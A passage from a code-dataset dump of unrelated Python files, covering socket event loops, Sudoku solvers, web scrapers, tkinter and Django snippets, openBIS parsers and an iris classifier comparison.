= self.new_sockets.pop(0)\n self.init_socket(socket, name)\n\n def set_status(self, sock, r=None, w=None):\n with self.register_lock:\n if r is not None:\n if r:\n self.poller.add_reader(sock)\n else:\n self.poller.remove_reader(sock)\n if w is not None:\n if w:\n self.poller.add_writer(sock)\n if not self.write_delay:\n # Force get_active() completion\n self.control.write(\"x\")\n else:\n self.poller.remove_writer(sock)\n\n def loop(self, timeout=1):\n \"\"\"\n Generic event loop\n \"\"\"\n self.metrics.loops += 1\n self.create_pending_sockets()\n self.metrics.sockets_count = len(self.sockets)\n if self.sockets:\n r, w = self.poller.get_active(timeout)\n self.cnt_polls += 1\n # Process write events before read\n # to catch refused connections\n for s in w:\n self.metrics.handle_writes += 1\n self.guarded_socket_call(s, s.handle_write)\n # Process read events\n for s in r:\n if s.closing:\n logger.info(\"Trying to read from closed socked\")\n self.metrics.handle_closed_reads += 1\n else:\n self.metrics.handle_reads += 1\n self.guarded_socket_call(s, s.handle_read)\n else:\n # No socket initialized. Sleep to prevent CPU hogging\n time.sleep(timeout)\n\n def run(self, run_forever=False):\n \"\"\"\n Socket factory event loop.\n\n :param run_forever: Run event loop forever, when True, else shutdown\n fabric when no sockets available\n \"\"\"\n logger.info(\"Running socket factory (%s)\", self.poller.__class__.__name__)\n self.create_pending_sockets()\n if run_forever:\n cond = lambda: True\n else:\n if self.write_delay:\n cond = lambda: bool(self.sockets)\n else:\n cond = lambda: len(self.sockets) > 1\n # Wait for any socket\n while not cond():\n time.sleep(1)\n last_tick = last_stale = time.time()\n while cond() and not self.to_shutdown:\n self.loop(1)\n t = time.time()\n if self.tick_callback and t - last_tick >= 1:\n self.metrics.ticks += 1\n try:\n self.tick_callback()\n except Exception:\n error_report()\n logger.info(\"Restoring from tick() failure\")\n last_tick = t\n if t - last_stale >= 1:\n self.close_stale()\n last_stale = t\n logger.info(\"Stopping socket factory\")\n","sub_path":"lib/nbsocket/socketfactory.py","file_name":"socketfactory.py","file_ext":"py","file_size_in_byte":10138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"205540228","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 13 10:54:25 2018\n\n@author: obp48\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom decimal import * \nimport random\nimport pandas as pd\nimport pickle\n\ndata_dir='./../../../../../../Dropbox/LML_research/ee_data'\n\nT = 1040\nN_ensemble=1\n\nensemble = pd.DataFrame(index=np.arange(0,N_ensemble),columns=np.arange(0,T))\nensemble.iloc[:,0]=np.ones(N_ensemble)\n\n## T multiplicative repetitions\n#for t in range(1, T):\n# # 50% chance of 0.6x what we had before, or\n# # 50% chance of 1.5x what we had before.\n# old=ensemble.iloc[0,t-1]\n# new=Decimal(old)*Decimal(np.random.choice([0.6, 1.5]))\n# ensemble.iloc[:,t]=new \n#ensemble.to_pickle(data_dir+\"coin_20_years.pkl\")\nensemble=pd.read_pickle(data_dir+\"coin_20_years.pkl\")\n\nx = np.arange(T)\nplt.semilogy(x, ensemble.iloc[0,:], 'b-', label='$N=1$')\n#plt.plot(x, np.mean(ensemble.iloc[0:100,:]), 'g-', label='$N=100$')\n#plt.plot(x, np.mean(ensemble.iloc[0:10000,:]), 'r-', label='$N=10,000$')\n#plt.plot(x, np.mean(ensemble), 'k-', label='$N=1,000,000$')\nplt.xlim((0,max(ensemble.columns)))\nplt.legend()\nplt.xlabel('$t$')\nplt.ylabel('$x(t)$')\n\n\nplt.savefig(\"./../x_of_t_log_20_year.pdf\", bbox_inches='tight')\nplt.show()\n","sub_path":"chapter_why/figs/python/x_of_t_log_20_year.py","file_name":"x_of_t_log_20_year.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"272006551","text":"import math;\nclass Solution:\n def __init__(self):\n super().__init__()\n\n def isValidSudoku(self, board):\n res = self._dfs(board)\n return res\n\n def solveSudoku(self, board):\n self._dfs(board)\n return board\n \n def _dfs(self, board):\n for i in range(len(board)):\n for j in range(len(board[i])):\n if board[i][j] == '.':\n for m in range(10):\n if self.isValidChar(board, i, j, str(char)):\n board[i][j] = str(char)\n if self._dfs(board):\n return True\n else:\n board[i][j] = '.'\n return False\n return True;\n\n def isValidChar(self, board, row, col, char):\n for i in range(9):\n if board[i][col] == char:\n return False\n if board[row][i] == char:\n return False\n m = math.floor(row / 3)\n n = math.floor(col / 3)\n for i in range(m * 3, m * 3 + 3, 1):\n for i in range(n * 3, n * 3 + 3, 1):\n if board[i][j] == char:\n return False\n","sub_path":"数据结构与算法/极客时间/剪枝/数独/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292744441","text":"\"\"\"\n Version Sofware: 0.0.0\n Version Python: 3.7\n\"\"\"\n\nimport main\nimport tkinter as tk\nimport ideal as id\nimport balistico as bl\n\nclass menu(tk.Frame):\n propiedades = main.propiedades() #Importando propiedades del proyecto\n ventana = tk.Tk()\n ventana.title(propiedades.version)\n ventana.config(bg=\"white\")\n ventana.config(relief=\"flat\", bd=8) #tipo de borde relief y bd es la medida\n\n frame = tk.Frame(ventana) #Creamos un frame el cual pertenece a ventana\n frame.pack(fill = \"both\", expand=\"true\") #Empaquetamos el frame\n frame.config(bg = \"#bfbfbf\", width = propiedades.default_size_ancho, height = propiedades.default_size_alto) #Medidas iniciales de la ventana + Color de fondo\n ventana.mainloop()\n","sub_path":"dev/interfaz.py","file_name":"interfaz.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"73499355","text":"from tkinter import *\nfrom tkinter.messagebox import *\nfrom tkinter.filedialog import *\n\nclass InterfaceConfirmation(Frame):\n\n def __init__(self, fenetre,rep,dico,suppr_originaux, **kwargs):\n Frame.__init__(self, fenetre, **kwargs)\n str_originaux=\"\"\n if (suppr_originaux==1):\n str_originaux=\"supprimés\"\n else:\n str_originaux=\"conservés\"\n self.message_principal = Label(self, text=\"Dans le dossier \"+rep+\", encodage dans les formats : \"+self.str_dict(dico)+\".\\n Les originaux seront \" + str_originaux+ \".\\nCliquez sur Suivant pour lancer l'encodage \\n\")\n self.message_principal.pack()\n\n def str_dict(self,un_dico): #Pour afficher correctement les préconfigs\n s=\"\\n\"\n for k in un_dico.keys():\n s=s+k+\"\\n\"\n return s\n","sub_path":"interfaceConfirmation.py","file_name":"interfaceConfirmation.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"516210087","text":"from peptide_builders import PeptideMolecule\nfrom functional_group_enumerator import Cocktail\n\nif __name__ == '__main__':\n\n peptide_backbone = PeptideMolecule(6)\n cocktail = Cocktail(\n peptide_backbone,\n ligand_library = ['Br','I', 'Cl', 'F', 'I', 'F']\n )\n print (len(cocktail.shake()))","sub_path":"cocktail_shaker/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"512370393","text":"# exemplo 4 IMC com ciclo - while\r\n\r\nresp = 's'\r\nwhile resp == 's':\r\n peso=float(input(\"Digite o peso da pessoa (Kg): \"))\r\n altura = float(input(\"Digite a altura da pessoa (m): \"))\r\n if (peso > 0 and altura > 0.10 and altura < 2.5):\r\n imc= peso / altura**2\r\n print(\"O IMC é: \",imc, \"Kg/m**2\")\r\n else:\r\n print(\"Verifique por favor, valor incorreto!!!\")\r\n\r\n resp = input(\"\\n Deseja continuar (s/n) ? \")\r\n\r\nprint(\"\\n até logo!!!!!\")\r\n","sub_path":"aula 10/exempo4.py","file_name":"exempo4.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"69447879","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('table/', views.table, name='table'),\n path('add/', views.add_channel, name='add_channel'),\n path('channel//', views.channel, name='channel'),\n path('logout/', views.log_out, name='logout'),\n path('register/', views.registerPage, name=\"register\"),\n path('login/', views.loginPage, name=\"login\"),\n path('', views.home, name='home'),\n path('edit//', views.edit, name=\"edit\"),\n\n]\n","sub_path":"TelegramChannels/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"404176043","text":"import pandas as pd\r\nimport selenium\r\n\r\nimport os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import Select\r\nimport pandas as pd\r\nimport time\r\n\r\ndriver= webdriver.Chrome(executable_path=r\"C:\\Users\\Merit\\Downloads\\chromedriver_win32\\chromedriver.exe\")\r\ndriver.get(\"https://ai.fmcsa.dot.gov/hhg/Search.asp?ads=a\")\r\ndriver.maximize_window()\r\ntime.sleep(1)\r\nstates1=driver.find_elements_by_xpath(\"//option[contains(text(),'Please select state')]//following::option\")\r\ntime.sleep(1)\r\nStates=[]\r\nwriter=pd.ExcelWriter(\"States.xlsx\",engine='xlsxwriter')\r\nfor i in states1:\r\n States.append(i.text)\r\nfor j in States[0:10]:\r\n driver.find_element_by_xpath(\"//option[contains(text(),'\"+j+\"')]\").click()\r\n time.sleep(1)\r\n driver.find_element_by_xpath(\"//input[@value='Search']\").click()\r\n dt=driver.find_elements_by_xpath(\"//tr[contains(@scope,'row')]\")\r\n listofcompany= []\r\n for k in dt:\r\n listofcompany.append(k.text.split(\" \"))\r\n driver.back()\r\n df=pd.DataFrame(listofcompany,columns=[\"COMPANY_NAME\",\"HEADQUATERS_LOCATION\",\"COMPANY_TYPE\",\"FLEET_SIZE\"])\r\n df.to_excel(writer,sheet_name=j, index=False)\r\nwriter.save()\r\nwriter.close()\r\ndriver.close()","sub_path":"PYTHON SELENIUM ASSIGNMENT/TASK3 STATES COMPANY/states.py","file_name":"states.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"274123580","text":"import argparse\nimport collections\nimport copy\nimport sys\n\nLocation = collections.namedtuple('Location', ['row', 'col'])\n\n\nclass ReachedContradiction(ValueError):\n pass\n\n\nclass SquareMap(collections.UserDict):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._side_len = None\n self._mini_square_len = None\n\n @property\n def side_len(self):\n assert self._side_len\n return self._side_len\n\n @side_len.setter\n def side_len(self, value):\n assert isinstance(value, int)\n self._side_len = value\n\n @property\n def mini_square_len(self):\n return self._mini_square_len\n\n @mini_square_len.setter\n def mini_square_len(self, value):\n assert isinstance(value, int)\n self._mini_square_len = value\n\n\ndef construct_square_map(mini_square_len, symbols):\n dct = SquareMap()\n length = mini_square_len * mini_square_len\n dct.side_len = length\n dct.mini_square_len = mini_square_len\n\n for row in range(length):\n for col in range(length):\n dct[Location(row, col)] = set(symbols)\n\n return dct\n\n\ndef insert_symbol(square_map, location, symbol):\n return remove_symbol_from_locations(\n square_map,\n locations_affected_by_location(square_map, location),\n symbol\n )\n\n\ndef remove_symbol_from_locations(square_map, locations, symbol):\n total_removed = 0\n modified = False\n for loc in locations:\n allowed = square_map[loc]\n\n assert len(allowed) > 0, 'got {allowed}'.format(**locals())\n if len(allowed) == 1 and symbol in allowed:\n raise ReachedContradiction('{symbol} is alone in {allowed}'.format(**locals()))\n\n try:\n allowed.remove(symbol)\n total_removed += 1\n except KeyError:\n pass\n\n return total_removed\n\n\ndef locations_affected_by_location(square_map, location):\n affected_rows = [Location(row, location.col) for row in range(square_map.side_len)]\n affected_cols = [Location(location.row, col) for col in range(square_map.side_len)]\n affected_square = []\n mini_square_len = square_map.mini_square_len\n square_row = mini_square_len * (location.row // mini_square_len)\n square_col = mini_square_len * (location.col // mini_square_len)\n for row in range(square_row, square_row+mini_square_len):\n for col in range(square_col, square_col+mini_square_len):\n affected_square.append(Location(row, col))\n\n affected = set(affected_rows + affected_cols + affected_square)\n affected.remove(location)\n return affected\n\n\ndef solve(square_map):\n finished, square_map, _ = eliminate(square_map)\n if finished:\n return True, square_map\n best_squares = []\n for loc, symbols in sorted(square_map.items(), key=lambda item: len(item[1])):\n for sym in symbols:\n if len(symbols) == 1:\n continue\n copied = copy.deepcopy(square_map)\n copied[loc].remove(sym)\n try:\n solved, result, eliminated = eliminate(copied)\n except ReachedContradiction:\n continue\n if solved:\n return True, result\n else:\n best_squares.append((eliminated, result))\n best_squares.sort(key=lambda e: e[0], reverse=True)\n for _, sm in best_squares:\n print('Number of best squares is', len(best_squares))\n solved, result = solve(sm)\n if solved:\n return True, result\n return False, None\n\n\ndef eliminate(square_map):\n total_eliminated = 0\n while True:\n modified_any = False\n finished = True\n for location, symbols in square_map.items():\n if len(symbols) == 1:\n symbol = next(iter(symbols))\n affected = locations_affected_by_location(square_map, location)\n modified_count = remove_symbol_from_locations(square_map, affected, symbol)\n total_eliminated += modified_count\n modified_any = modified_any or modified_count > 0\n else:\n finished = False\n if finished:\n return finished, square_map, total_eliminated\n elif not modified_any:\n return modified_any, square_map, total_eliminated\n\n\ndef parse_input_file(file):\n with open(file, mode='r', encoding='ascii') as f:\n text = f.read()\n\n print(text)\n lines = iter(text.splitlines(keepends=False))\n try:\n mini_square_length = int(next(lines))\n except TypeError:\n print('Invalid input file. Expected integer on the first line for number of symbols')\n sys.exit(1)\n if not (2 <= mini_square_length <= 3):\n print('Expected N to be either 2 or 3')\n sys.exit(2)\n if len(text.splitlines(keepends=False)) - 1 != mini_square_length*mini_square_length:\n print('Expected number of lines to be', mini_square_length*mini_square_length)\n symbol_loc_map = {}\n\n for row, line in enumerate(lines):\n symbols = [s for s in line.split() if s]\n for col, sym in enumerate(symbols):\n if sym == '0':\n continue\n symbol_loc_map[Location(row, col)] = sym\n\n all_symbols = set(symbol_loc_map.values())\n square_map = construct_square_map(mini_square_length, all_symbols)\n\n for loc, symbol in symbol_loc_map.items():\n insert_symbol(square_map, loc, symbol)\n\n return square_map\n\n\ndef print_square_map(square_map):\n def stringify_set(symbols):\n if len(symbols) == 1:\n return next(iter(symbols))\n else:\n return 'U'\n\n for row in range(square_map.side_len):\n line = []\n for loc, sym in square_map.items():\n if loc.row == row:\n line.append((loc, sym))\n line.sort()\n pretty = (stringify_set(e[1]) for e in line)\n print(' '.join(pretty))\n\n\ndef is_valid(square_map):\n for loc, symbols in square_map.items():\n sym = next(iter(symbols))\n affected = locations_affected_by_location(square_map, loc)\n for affected_loc in affected:\n if affected_loc == loc:\n continue\n if len(square_map[affected_loc]) != 1 or sym in square_map[affected_loc]:\n return False\n return True\n\n\ndef run(*, mini_square_side_length, marked_locations):\n assert 2 <= mini_square_side_length <= 3\n assert len(marked_locations) <= 81\n\n all_symbols = set(loc[2] for loc in marked_locations)\n\n assert (len(all_symbols) >= mini_square_side_length * mini_square_side_length)\n\n square_map = construct_square_map(mini_square_side_length, all_symbols)\n\n for row, col, symbol in marked_locations:\n insert_symbol(square_map, Location(row, col), symbol)\n\n solved, result = solve(square_map)\n\n assert solved\n\n return list(iter_rows(result, mini_square_side_length))\n\n\ndef iter_rows(solution, mini_square_side_length):\n cells = sorted(solution.items())\n column_count = mini_square_side_length * mini_square_side_length\n for row in range(column_count):\n row_cells = sorted(c for c in cells if c[0].row == row)\n print('row cells are', row_cells)\n yield [next(iter(c[1])) for c in row_cells]\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n args = parser.parse_args()\n square_map = parse_input_file(args.file)\n solved, result = solve(square_map)\n if solved:\n print('Solution')\n print_square_map(result)\n sys.exit()\n else:\n print('Could not find solution')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"taesko/fast_tasks/ft/tasks/squares.py","file_name":"squares.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"454614210","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pygame\n\nclass Brick_GUI(pygame.sprite.Sprite):\n\n # Các giá trị của khối gạch\n def __init__(self,brick,unit):\n super(Brick_GUI, self).__init__()\n self.unit = int(unit)\n\n self.length = brick.length\n\n if brick.isVetical:\n self.img_load = pygame.image.load('image/vertical.png')\n self.image = pygame.transform.scale(self.img_load,(self.unit,self.length*self.unit))\n else:\n if brick.id == 1:\n self.img_load = pygame.image.load('image/object.png')\n else:\n self.img_load = pygame.image.load('image/horizontal.png')\n self.image = pygame.transform.scale(self.img_load,(self.unit*self.length,self.unit))\n\n self.rect = self.image.get_rect()\n self.rect.topleft = [(brick.position[1])*self.unit + 12,(brick.position[0]+1)*self.unit + 108]\n\n def moveVertical(self,moves,pixel):\n tmp = self.rect.topleft[1]\n if moves < 0:\n while self.rect.topleft[1] >= ( tmp + moves*self.unit):\n self.rect.y = self.rect.topleft[1] + moves*pixel\n else:\n while self.rect.topleft[1] <= ( tmp + moves*self.unit):\n #print(self.rect.topleft[1])\n self.rect.y = self.rect.topleft[1] + moves*pixel\n #self.rect.move_ip(0,1)\n\n def moveHorizontal(self,moves,pixel):\n tmp = self.rect.topleft[0]\n if moves < 0:\n while self.rect.topleft[0] >= (tmp + moves*self.unit):\n #self.rect.x += moves*pixel\n self.rect.x = self.rect.topleft[0] + moves*pixel\n else:\n while self.rect.topleft[0] <= (tmp + moves*self.unit):\n #self.rect.x += moves*pixel\n self.rect.x = self.rect.topleft[0] + moves*pixel","sub_path":"Brick_GUI.py","file_name":"Brick_GUI.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"175031132","text":"# Copyright (c) 2010 gocept gmbh & co. kg\n# See also LICENSE.txt\n\n# See also LICENSE.txt\n\nimport asm.cmsui.testing\nimport asm.cms.page\nimport transaction\nimport ZODB.blob\n\n\nclass Asset(asm.cmsui.testing.SeleniumTestCase):\n\n def setUp(self):\n super(Asset, self).setUp()\n self.cms['asset'] = asset = asm.cms.page.Page('asset')\n transaction.commit()\n self.selenium.open('http://%s/++skin++cms/cms/asset/edition-/@@edit' %\n self.selenium.server)\n\n def test_asset_download_button_hidden_if_no_content(self):\n self.selenium.assertElementNotPresent(\n 'xpath=//input[@type=\"button\" and @value=\"Download\"]')\n\n def test_asset_download_button(self):\n self.cms['asset'].editions.next().content = ZODB.blob.Blob()\n transaction.commit()\n\n s = self.selenium\n s.open('http://%s/++skin++cms/cms/asset/edition-/@@edit' % s.server)\n s.click('xpath=//input[@type=\"button\" and @value=\"Download\"]')\n self.assertEquals(\n 'http://%s/++skin++cms/cms/asset/edition-/@@edit' % s.server\n ,s.getLocation())\n","sub_path":"src/asm/cmsui/tests/test_asset.py","file_name":"test_asset.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371974243","text":"import scrapy\n\n\nclass CategoriesSpider(scrapy.Spider):\n name = \"categories\"\n start_urls = [\n 'https://suzyshier.com/collections/sz_shop-all'\n ]\n\n def parse(self, response):\n for category in response.css('li.menu-depth-2 div.menu-title'):\n\n # follow bottoms link\n if category.css('a::text').extract_first() == 'Bottoms':\n for i in range(1, 3):\n yield response.follow(\n 'https://suzyshier.com'\n + category.css('a::attr(href)').extract_first()\n + '?page={}'.format(i),\n self.parse_bottom_links\n )\n\n # follow web exclusives link\n elif category.css('a::text').extract_first() == 'Web Exclusives':\n yield response.follow(\n 'https://suzyshier.com'\n + category.css('a::attr(href)').extract_first(),\n self.parse_web_exclusives_links\n )\n\n def parse_bottom_links(self, response):\n links = []\n\n for item in response.css('div.product-tile-image'):\n links.append(item.css('a::attr(href)').extract_first())\n\n for link in links:\n yield response.follow(\n 'https://suzyshier.com' + link, self.parse_bottom_items\n )\n\n def parse_bottom_items(self, response):\n specs = response.css('div#toggle-product__specs ul li::text').extract()\n for spec in specs:\n spec.strip()\n\n if response.css('div.product__price-wrapper span.visually-hidden'):\n price = response.css('span.product__compare-at::text').extract_first().strip()\n else:\n price = response.css('span.product__price::text').extract_first().strip()\n\n yield {\n 'title': response.css('h1.product__header::text').extract_first(),\n 'price': price,\n 'color': response.css('div.product__option-label span::text').extract_first(),\n 'sizes': response.css('div.product__radio-size-text::text').extract(),\n 'specs': specs,\n 'description': response.css('div.product__description-toggle-item::text').extract_first().strip()\n }\n\n def parse_web_exclusives_links(self, response):\n links = []\n\n for item in response.css('div.product-tile-image'):\n links.append(item.css('a::attr(href)').extract_first())\n\n for link in links:\n yield response.follow(\n 'https://suzyshier.com' + link, self.parse_web_exclusives_items\n )\n\n def parse_web_exclusives_items(self, response):\n if response.css('div.product__price-wrapper span.visually-hidden'):\n price = response.css('span.product__compare-at::text').extract_first().strip()\n discount = response.css('span.product__price::text').extract_first().strip()\n else:\n price = response.css('span.product__price::text').extract_first().strip()\n discount = 'No discount'\n\n yield {\n 'title': response.css('h1.product__header::text').extract_first(),\n 'price': price,\n 'discount_price': discount\n }\n","sub_path":"parser_wsy/spiders/items_spider.py","file_name":"items_spider.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483220631","text":"from java.lang import UnsupportedOperationException\nfrom ..definition import Definition\nfrom .poi_cleaner import PoiCleaner\n\n\nclass DefinitionParserFactory(object):\n\n @staticmethod\n def get_parser(definition_type):\n if definition_type in ['VOCABULARY_TYPE', 'SAMPLE_TYPE', 'EXPERIMENT_TYPE', 'DATASET_TYPE', 'EXPERIMENT',\n 'SAMPLE']:\n return GeneralDefinitionParser\n elif definition_type in ['PROPERTY_TYPE', 'SPACE', 'PROJECT']:\n return PropertiesOnlyDefinitionParser\n else:\n raise UnsupportedOperationException(\n \"Cannot create \" + str(\n definition_type) + \". Make sure Definition (First row, first cell of each definit)\")\n\n\nclass PropertiesOnlyDefinitionParser(object):\n\n @staticmethod\n def parse(poi_definition):\n DEFINITION_TYPE_ROW = 0\n DEFINITION_TYPE_CELL = 0\n PROPERTIES_HEADER_ROW = 1\n PROPERTIES_VALUES_ROW_START = 2\n\n row_numbers = {\n 'DEFINITION_TYPE_ROW': DEFINITION_TYPE_ROW,\n 'DEFINITION_TYPE_CELL': DEFINITION_TYPE_CELL,\n 'ATTRIBUTES_HEADER_ROW': None,\n 'ATTRIBUTES_VALUES_ROW': None,\n 'PROPERTIES_HEADER_ROW': PROPERTIES_HEADER_ROW,\n 'PROPERTIES_VALUES_ROW_START': PROPERTIES_VALUES_ROW_START\n }\n\n poi_definition = PoiCleaner.clean_data(poi_definition, row_numbers)\n definition = Definition()\n definition.type = poi_definition[DEFINITION_TYPE_ROW][DEFINITION_TYPE_CELL]\n\n if PropertiesOnlyDefinitionParser.hasProperties(poi_definition):\n properties_headers = poi_definition[PROPERTIES_HEADER_ROW]\n\n for property_definitions in poi_definition[PROPERTIES_VALUES_ROW_START:]:\n property = {}\n for col, header in properties_headers.items():\n property[header] = property_definitions[col]\n definition.properties.append(property)\n\n return definition\n\n @staticmethod\n def hasProperties(poi_definition):\n PROPERTIES_HEADER_ROW = 1\n return len(poi_definition) > PROPERTIES_HEADER_ROW\n\n\nclass GeneralDefinitionParser(object):\n\n @staticmethod\n def parse(poi_definition):\n DEFINITION_TYPE_ROW = 0\n DEFINITION_TYPE_CELL = 0\n ATTRIBUTES_HEADER_ROW = 1\n ATTRIBUTES_VALUES_ROW = 2\n PROPERTIES_HEADER_ROW = 3\n PROPERTIES_VALUES_ROW_START = 4\n\n row_numbers = {\n 'DEFINITION_TYPE_ROW': DEFINITION_TYPE_ROW,\n 'DEFINITION_TYPE_CELL': DEFINITION_TYPE_CELL,\n 'ATTRIBUTES_HEADER_ROW': ATTRIBUTES_HEADER_ROW,\n 'ATTRIBUTES_VALUES_ROW': ATTRIBUTES_VALUES_ROW,\n 'PROPERTIES_HEADER_ROW': PROPERTIES_HEADER_ROW,\n 'PROPERTIES_VALUES_ROW_START': PROPERTIES_VALUES_ROW_START\n }\n\n poi_definition = PoiCleaner.clean_data(poi_definition, row_numbers)\n\n definition = Definition()\n definition.type = poi_definition[DEFINITION_TYPE_ROW][DEFINITION_TYPE_CELL]\n for col, header in poi_definition[ATTRIBUTES_HEADER_ROW].items():\n cell_value = poi_definition[ATTRIBUTES_VALUES_ROW][col]\n definition.attributes[header] = cell_value\n\n if GeneralDefinitionParser.hasProperties(poi_definition):\n properties_headers = poi_definition[PROPERTIES_HEADER_ROW]\n\n for property_definitions in poi_definition[PROPERTIES_VALUES_ROW_START:]:\n property = {}\n for col, header in properties_headers.items():\n property[header] = property_definitions[col]\n definition.properties.append(property)\n\n return definition\n\n @staticmethod\n def hasProperties(poi_definition):\n PROPERTIES_HEADER_ROW = 3\n return len(poi_definition) > PROPERTIES_HEADER_ROW\n","sub_path":"openbis_standard_technologies/dist/core-plugins/xls-import/1/as/services/xls-import-api/parsers/to_definition/poi_to_definition/definition_parsers.py","file_name":"definition_parsers.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"526408391","text":"# -*- coding: utf-8 -*-\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\nfrom get_md5 import gethash\r\nfrom datetime import date\r\n\r\ndef get_schedule(url):\r\n html = urllib.request.urlopen(url)\r\n soup = BeautifulSoup(html,\"lxml\")\r\n c = \"http://solidemo.jp/schedule/\"\r\n try:\r\n return [[int(i.parent.get(\"class\")[1][3:]),\r\n i.text,\r\n c + i.next.next.next.next.get(\"href\")[2:],\r\n i.next.next.next.next.text] for i in soup.findAll(\"span\")[3:-1]]\r\n except:\r\n return []\r\n \r\ndef get_detail(url,title):\r\n html = urllib.request.urlopen(url)\r\n soup = BeautifulSoup(html,\"lxml\")\r\n try:\r\n body = soup.select(\"#contents > div.block\")[0].text\r\n body = body[body.find(\"tw,fl\")+9:]\r\n except:\r\n body = \"\"\r\n return [gethash(title+body),body.strip()]\r\n\r\ndef return_list(dt):\r\n url = \"http://solidemo.jp/schedule/index.php?viewmode=&type=all&year=\"+str(dt.year)+\"&month=\"+str(dt.month)\r\n try:\r\n return [[date(year=dt.year,month=dt.month,day=int(i[0])),i[1],i[3],i[2]] + get_detail(i[2],i[3]) for i in get_schedule(url)]\r\n except:\r\n return []\r\n \r\nif __name__ == \"__main__\":\r\n d = return_list(date(year=2016,month=11,day=1))\r\n for i in d:\r\n print(i[5].encode(\"cp932\",\"ignore\").decode(\"cp932\"))\r\n","sub_path":"calendar_parser/parser_solidemo.py","file_name":"parser_solidemo.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"576371441","text":"\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn import tree, neighbors, datasets\r\nfrom sklearn.metrics import accuracy_score\r\nimport pickle\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.naive_bayes import GaussianNB\r\nfrom sklearn.svm import SVC\r\n\r\niris=datasets.load_iris()\r\nx=iris.data\r\ny=iris.target\r\n\r\n'''\r\nprint(len(x[0]))\r\nprint(x[0])\r\nprint(type(x))\r\n'''\r\n\r\ntree_classifier=tree.DecisionTreeClassifier()\r\nneighbor_classifier=neighbors.KNeighborsClassifier()\r\nlogisticRegression_classifier = LogisticRegression(solver='liblinear', multi_class='ovr')\r\nlda_classifier = LinearDiscriminantAnalysis()\r\ngaussian_classifier = GaussianNB()\r\nsvc_classifier = SVC(gamma='auto')\r\n\r\nsplits = [0.1*i for i in range(1,10)]\r\ntree_accuracies = []\r\nneighbor_accuracies = []\r\nlogisticRegression_accuracies = []\r\nlda_accuracies = []\r\ngaussian_accuracies = []\r\nsvc_accuracies = []\r\n\r\n#print(splits)\r\n\r\nfor i in range(9):\r\n split = splits[i]\r\n\r\n x_train,x_test,y_train,y_test=train_test_split(x,y,test_size=split)\r\n #print(len(x_train))\r\n\r\n\r\n\r\n tree_classifier.fit(x_train,y_train)\r\n neighbor_classifier.fit(x_train,y_train)\r\n logisticRegression_classifier.fit(x_train,y_train)\r\n lda_classifier.fit(x_train,y_train)\r\n gaussian_classifier.fit(x_train,y_train)\r\n svc_classifier.fit(x_train,y_train)\r\n\r\n tree_predictions=tree_classifier.predict(x_test)\r\n neighbor_predictions = neighbor_classifier.predict(x_test)\r\n logisticRegression_predictions = logisticRegression_classifier.predict(x_test)\r\n lda_predictions = lda_classifier.predict(x_test)\r\n gaussian_predictions = gaussian_classifier.predict(x_test)\r\n svc_predictions = svc_classifier.predict(x_test)\r\n\r\n '''\r\n print(type(tree_predictions))\r\n print(len(tree_predictions))\r\n print(tree_predictions[:10])\r\n '''\r\n\r\n tree_accuracy = accuracy_score(y_test,tree_predictions)\r\n neighbor_accuracy = accuracy_score(y_test,neighbor_predictions)\r\n logisticRegression_accuracy = accuracy_score(y_test, logisticRegression_predictions)\r\n lda_accuracy = accuracy_score(y_test, lda_predictions)\r\n gaussian_accuracy = accuracy_score(y_test, gaussian_predictions)\r\n svc_accuracy = accuracy_score(y_test, svc_predictions)\r\n \r\n print(\"split: \",split)\r\n print(\"tree accuracy: \",tree_accuracy)\r\n print(\"neighbor accuracy: \",neighbor_accuracy)\r\n print(\"log.Regression acc: \",logisticRegression_accuracy)\r\n print(\"lda acc: 